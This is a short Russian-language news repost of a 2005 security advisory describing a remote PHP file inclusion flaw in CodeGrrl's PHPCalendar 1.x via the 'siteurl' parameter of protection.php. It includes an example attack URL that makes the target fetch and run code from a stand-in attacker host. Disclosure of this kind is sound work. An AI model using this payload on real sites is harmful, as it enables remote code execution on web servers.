Категория > Новости мира Интернет > PHP инклюдинг в продуктах CodeGrrl - «Интернет»
PHP инклюдинг в продуктах CodeGrrl - «Интернет»16-11-2005, 06:51. Автор: Carroll |
Программы: PHPCalendar 1.x Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует при обработке входных данных в параметре "siteurl" сценария protection.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на системе с привилегиями web сервера. Для успешной эксплуатации уязвимости опция register_globals должна быть включена в конфигурационном файле PHP. Пример: http://www.example.com/protection.php?action=logout& siteurl=http://yourhost.com/malicoius-code.txt URL производителя: http://codegrrl.com/ Решение: Способов устранения уязвимости не существует в настоящее время. Перейти обратно к новости |